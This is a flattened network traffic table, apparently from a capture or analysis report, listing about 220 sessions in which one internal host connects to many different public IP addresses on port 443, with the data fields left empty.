                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12727192.168.2.233373614.246.180.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12728192.168.2.233535420.241.52.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12729192.168.2.234190835.159.210.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12730192.168.2.2338092148.61.212.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12731192.168.2.235256662.36.60.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12732192.168.2.2359656144.217.58.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12733192.168.2.235246025.247.60.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12734192.168.2.2354356112.124.14.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12735192.168.2.2352840212.195.83.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12736192.168.2.23498584.207.228.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12737192.168.2.234821290.239.9.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12738192.168.2.234233037.132.49.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12739192.168.2.235656034.210.231.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12740192.168.2.234908612.74.143.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12741192.168.2.2351952193.236.68.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12742192.168.2.2357440198.37.73.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12743192.168.2.2349924160.156.151.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12744192.168.2.233817269.54.12.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12745192.168.2.234551677.53.134.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12746192.168.2.2351870209.32.196.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12747192.168.2.234045878.214.14.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12748192.168.2.2341190132.197.70.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12749192.168.2.2348482110.153.167.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12750192.168.2.235271459.39.8.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12751192.168.2.2341388122.36.44.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12752192.168.2.2350370219.116.188.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12753192.168.2.2345292197.246.188.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12754192.168.2.2360068157.181.148.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12755192.168.2.2355902175.193.50.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12756192.168.2.2357448149.45.115.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12757192.168.2.235006645.229.103.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12758192.168.2.2345912103.121.26.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12759192.168.2.2349444222.253.73.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12760192.168.2.235894257.10.101.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12761192.168.2.2343566178.5.28.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12762192.168.2.2357206122.56.217.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12763192.168.2.2345412207.153.73.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12764192.168.2.233811414.54.128.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12765192.168.2.2338016114.91.111.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12766192.168.2.235625496.13.216.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12767192.168.2.2359344122.144.161.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12768192.168.2.234061427.64.57.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12769192.168.2.2352196193.14.249.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12770192.168.2.2352942212.162.77.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12771192.168.2.2344650156.84.182.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12772192.168.2.234577499.251.96.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12773192.168.2.2349514105.132.147.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12774192.168.2.2344666206.178.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12775192.168.2.2345218189.145.226.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12776192.168.2.2356566193.6.184.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12777192.168.2.234445046.13.36.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12778192.168.2.233860054.221.204.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12779192.168.2.2360314181.201.145.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12780192.168.2.233632842.236.73.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12781192.168.2.2352344198.178.243.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12782192.168.2.233441483.175.230.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12783192.168.2.233533484.47.60.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12784192.168.2.233732260.253.74.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12785192.168.2.2341798211.90.65.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12786192.168.2.233867288.4.215.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12787192.168.2.233593257.43.59.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12788192.168.2.235067499.117.20.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12789192.168.2.235327219.186.181.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12790192.168.2.2336910107.214.67.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12791192.168.2.2360562100.40.171.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12792192.168.2.2335944118.37.125.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12793192.168.2.2336538101.227.181.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12794192.168.2.2351360199.249.35.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12795192.168.2.233324047.15.120.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12796192.168.2.2353734197.42.169.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12797192.168.2.2338272168.207.179.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12798192.168.2.2346276112.6.26.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12799192.168.2.235723097.182.177.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12800192.168.2.2339658140.187.236.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12801192.168.2.2336384100.232.231.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12802192.168.2.2355122121.152.87.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12803192.168.2.2351330157.33.225.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12804192.168.2.2358812197.205.169.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12805192.168.2.2352556173.151.32.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12806192.168.2.2337572174.108.254.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12807192.168.2.2335270138.149.176.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12808192.168.2.235384084.40.14.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12809192.168.2.2337318126.188.181.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12810192.168.2.2360804196.243.41.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12811192.168.2.234358260.144.212.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12812192.168.2.2359346152.205.243.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12813192.168.2.233697073.63.203.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12814192.168.2.2357294211.52.216.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12815192.168.2.2352136202.19.102.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12816192.168.2.234482253.170.162.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12817192.168.2.235558090.18.216.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12818192.168.2.2335492106.21.230.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12819192.168.2.235393072.155.46.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12820192.168.2.2355850200.155.7.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12821192.168.2.2345052218.153.86.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12822192.168.2.234809067.199.133.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12823192.168.2.2334808213.223.122.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12824192.168.2.2353500202.71.253.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12825192.168.2.2348692146.251.15.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12826192.168.2.2348182138.167.118.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12827192.168.2.2355340198.129.47.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12828192.168.2.2347678219.71.22.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12829192.168.2.2341230209.49.53.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12830192.168.2.233825674.175.39.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12831192.168.2.234447071.233.132.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12832192.168.2.2334668187.49.7.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12833192.168.2.2351834105.33.234.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12834192.168.2.2356044123.42.177.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12835192.168.2.2340346158.231.204.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12836192.168.2.2356148123.8.221.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12837192.168.2.2340054150.198.178.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12838192.168.2.235877464.74.144.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12839192.168.2.2338012120.33.21.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12840192.168.2.2343634163.195.185.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12841192.168.2.2351408136.228.6.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12842192.168.2.2346704135.101.168.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12843192.168.2.235457853.40.26.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12844192.168.2.235765853.73.198.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12845192.168.2.234624827.18.99.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12846192.168.2.233297843.214.198.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12847192.168.2.235405023.100.80.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12848192.168.2.2359200165.138.35.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12849192.168.2.2348400188.48.62.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12850192.168.2.2337098151.136.47.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12851192.168.2.2360018212.88.83.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12852192.168.2.2347760164.55.208.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12853192.168.2.2355130102.43.198.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12854192.168.2.234413417.31.23.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12855192.168.2.2358064125.109.80.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12856192.168.2.2342560118.28.162.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12857192.168.2.2358526192.45.137.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12858192.168.2.234593617.191.32.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12859192.168.2.2357938107.37.218.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12860192.168.2.2358662133.227.5.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12861192.168.2.2333560124.205.88.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12862192.168.2.2338152194.199.131.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12863192.168.2.235350049.112.183.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12864192.168.2.2353218123.191.65.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12865192.168.2.2341760147.160.65.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12866192.168.2.2335724178.22.181.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12867192.168.2.2360026188.0.153.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12868192.168.2.234605674.66.89.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12869192.168.2.235869041.60.190.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12870192.168.2.2360594196.14.0.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12871192.168.2.2349890124.240.129.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12872192.168.2.233510673.233.193.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12873192.168.2.2341480149.184.213.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12874192.168.2.233584665.235.239.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12875192.168.2.2356896115.223.45.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12876192.168.2.23571781.129.115.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12877192.168.2.234125023.213.102.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12878192.168.2.234875834.122.133.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12879192.168.2.2352726170.14.209.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12880192.168.2.2352122186.217.89.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12881192.168.2.235635698.242.228.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12882192.168.2.2352090108.221.69.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12883192.168.2.2351424184.55.202.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12884192.168.2.2345818120.96.63.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12885192.168.2.2347336144.81.225.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12886192.168.2.2352676122.198.226.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12887192.168.2.235535689.215.99.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12888192.168.2.234966272.158.194.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12889192.168.2.2342770193.147.91.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12890192.168.2.235049446.181.117.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12891192.168.2.235079484.25.91.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12892192.168.2.2351118160.87.194.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12893192.168.2.234801839.143.146.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12894192.168.2.233488467.130.90.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12895192.168.2.2341806138.88.20.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12896192.168.2.233976458.56.253.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12897192.168.2.23337609.134.61.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12898192.168.2.2334446205.70.51.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12899192.168.2.2352216156.67.135.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12900192.168.2.23583522.51.192.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12901192.168.2.2358406141.59.219.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12902192.168.2.2333068153.17.18.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12903192.168.2.2345250108.105.71.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12904192.168.2.2357558144.76.120.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12905192.168.2.2345802134.41.43.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12906192.168.2.2357656168.166.211.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12907192.168.2.234405661.174.93.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12908192.168.2.2353846190.242.30.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12909192.168.2.2346640108.97.85.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12910192.168.2.2354940175.69.63.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12911192.168.2.2341480205.118.170.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12912192.168.2.2344752118.81.208.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12913192.168.2.2349842213.164.78.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12914192.168.2.233505091.158.194.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12915192.168.2.233931092.47.41.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12916192.168.2.234461453.236.116.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12917192.168.2.233937219.177.41.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12918192.168.2.2357756126.101.32.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12919192.168.2.233992279.253.127.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12920192.168.2.2347148160.254.82.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12921192.168.2.2335248115.133.178.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12922192.168.2.2356244102.154.120.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12923192.168.2.234097849.218.168.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12924192.168.2.2344188167.65.182.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12925192.168.2.2358992191.37.7.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12926192.168.2.2336206115.249.126.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12927192.168.2.235477832.124.15.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12928192.168.2.2353256150.146.85.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12929192.168.2.23563365.66.123.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12930192.168.2.235119866.152.203.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12931192.168.2.235150043.238.29.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12932192.168.2.233714070.177.171.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12933192.168.2.2344942195.24.155.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12934192.168.2.235062443.25.171.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12935192.168.2.233359673.90.97.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12936192.168.2.234673031.92.37.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12937192.168.2.236051474.241.42.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12938192.168.2.2346150155.199.31.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12939192.168.2.2336760206.231.103.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12940192.168.2.234762057.61.57.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12941192.168.2.235811836.191.26.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12942192.168.2.23468141.223.196.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12943192.168.2.234320445.209.186.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12944192.168.2.235261227.175.1.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12945192.168.2.23498308.255.92.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12946192.168.2.2345966140.10.243.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12947192.168.2.2346414122.65.109.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
